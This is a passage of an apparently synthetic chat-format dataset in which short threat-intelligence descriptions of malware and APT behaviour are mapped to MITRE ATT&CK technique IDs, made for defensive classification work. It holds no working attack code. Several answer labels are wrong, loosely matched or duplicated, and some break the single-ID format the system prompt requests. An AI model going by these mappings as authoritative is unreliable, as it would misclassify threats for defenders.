Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has been executed through malicious e-mail attachments." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "calls cmd.exe to run various DLL files via rundll32." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldenSpy's setup file installs initial executables under the folder \"%WinDir%\\System32\\PluginManager\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of ‘QQMgr.inf’. Otherwise, it will use ‘hccutils.inf’ as an argument" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware operates on victims’ systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks" }, { "role": "assistant", "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a shortcut file and saves it in a Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs operating system information discovery using systeminfo." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Melcoz can monitor content saved to the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes C2 beacons using XOR." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 listed connected network shares." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda's PlugX variant has created a hidden folder on USB drives named \"RECYCLE.BIN\" to store malicious executables and collected data." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a directory, %USERPROFILE%\\AppData\\Local\\SKC\\, which is used to store collected log files." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using Set-CASMailbox" }, { "role": "assistant", "content": "T1098.005 - Device Registration', 'T1098.002 - Account Manipulation: Additional Email Delegate Permissions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This tactic uses public web services to host content that contains encoded commands that are decoded by the malware" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuietSieve can download and execute payloads on a target host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash', 'T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has added a leading \".\" to plist filenames, unlisting them from the Finder app and default Terminal directory listings." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can SSL encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.)." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard uses LD_PRELOAD to hide the malicious process launched inside the containers. The malware modified the /etc/ld.so.preload file to intercept shared libraries’ imported functions" }, { "role": "assistant", "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLAINTEE performs the \"tasklist\" command to list running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has digitally signed malware and utilities to evade detection." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "deletes the Registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For FIN7 attack routines, data can be compressed and/or encrypted before being exfiltrated." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GuLoader can use a number of different APIs for discovery and execution." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence." }, { "role": "assistant", "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Helminth has used Tasklist to get information on processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer uses a simple XOR cipher to encrypt traffic and files." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors used RDP and execute rdpclip.exe to exfiltrate information from the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has obfuscated strings in by base64 encoding, and then encrypting them." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can execute commands, including gathering user information, and send the results to C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet" }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark can delete files downloaded to the compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has been seen changing malicious files to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BloodHound can collect password policy information on the target environment." }, { "role": "assistant", "content": "T1201 - Password Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can identify logged in users across the domain and views user sessions." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically. Besides these, there are keyloggers, browser-focused password stealers, camera control applications, and other generic password stealers" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used \"net time\" to check the local time on a target system." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ‘microsoft-cache’ domain was used by the malware variant that communicated over HTTP. We found four unique samples communicating with this domain, which resolved to the same Hong Kong-based IP address used by the first two domains" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PolyglotDuke can be executed using rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor has used HTTP GET and POST requests for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main component." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has collected the username from a victim machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects a list of active and listening connections by using the command \"netstat -nao\" as well as a list of available network mappings with \"net use\"." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook has a command to delete a file." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zox has the ability to leverage local and remote exploits to escalate privileges." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Table 4: URL parameters Additionally, the command string is hashed using the same RGPH hashing algorithm as before" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain information about security software on the victim." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For this analysis, we looked at version 2.14.845, which has a configuration that differs from the others Dreambot versions in that the domain generation algorithm (DGA) is not used: therefore, the DGA variables and parameters are missing" }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest" }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "China Chopper's server component can upload local files." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ‘vsnet’ plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user’s computer and network. It was a ddos tool compiled to run on ARM systems" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar has the ability to identify domain administrator accounts." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has attached a malicious document to an email to gain initial access." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates new services to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can timestomp files on victims using a Web shell." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat actor using appcmd to delete logs and disable logging" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware has the ability to regularly take screenshots; what’s more, it takes screenshots when certain “interesting” applications are run, for instance, IM’s. Screenshots are stored in compressed format and are regularly sent to the C&C server – just like the audio recordings" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoudMiner used the \"ps\" command to monitor the running processes on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can obtain the computer name, OS version, and default language identifier." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon creates a base directory that contains the files and folders that are collected." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1608.001 - Upload Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KARAE can collect system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to delete files from a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A threat actor known as Silent Librarian/TA407/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back" }, { "role": "assistant", "content": "T1608.005 - Link Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has sent data to its C2 server via \"POST\" requests." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amadey has collected the computer name and OS version from a compromised machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hancitor has the ability to download additional files from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can set a scheduled task on the target system to execute commands remotely using at." }, { "role": "assistant", "content": "T1053.002 - Scheduled Task/Job: At" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": 